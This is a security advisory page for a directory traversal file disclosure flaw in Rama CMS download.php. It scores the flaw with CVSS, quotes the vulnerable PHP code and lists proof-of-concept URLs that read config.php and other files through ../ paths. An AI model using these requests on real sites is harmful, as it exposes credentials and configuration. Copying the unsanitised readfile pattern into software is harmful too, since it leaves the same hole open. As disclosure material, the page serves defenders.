Rama CMS <= 0.9.8 (download.php file) File Disclosure Vulnerability

2009-05-24 / 2009-05-25
Credit: Br0ly
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

#Start info: { # #Script Name: Rama Zaitan Cms # Script Project: http://sourceforge.net/project/showfiles.php?group_id=212495&package_id=255590 # Download: http://sourceforge.net/project/downloading.php?group_id=212495&filename=cms975.zip&a=5782381 # # 0.9.5 <= Versions <=0.9.8 # # by Br0ly. # br0ly.Code@gmail.com # # Brasil. # # Gretz: str0ke , Osirys, xscholler , 6_Bl4ck9_f0x6 and all my friends. # # Sorry for my bad english. ;/ # #End info } Php code : <?php $dir = 'uploads/'; $file = $_GET['file']; <-----------------------------------------------------------------> Vul header('Content-Disposition: attachment; filename='.$file); switch ($_GET['type']) { case 'Doc': header ('Content-type: application/msword'); break; case 'Excel': header ('Content-type: application/vnd.ms-excel'); break; case 'ZIP': header ('Content-type: application/zip'); break; case 'PPT': header ('Content-type: application/vnd.ms-powerpoint'); break; case 'PDF': header ('Content-type: application/pdf'); break; default: header ('application/force-download'); } readfile("$dir$file"); <-------------------------------------------------------> Vul ?> p0f : http://locahost/ramacms/download.php?file=download.php http://locahost/ramacms/download.php?file=../index.php http://locahost/ramacms/download.php?file=../config.php ;D


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top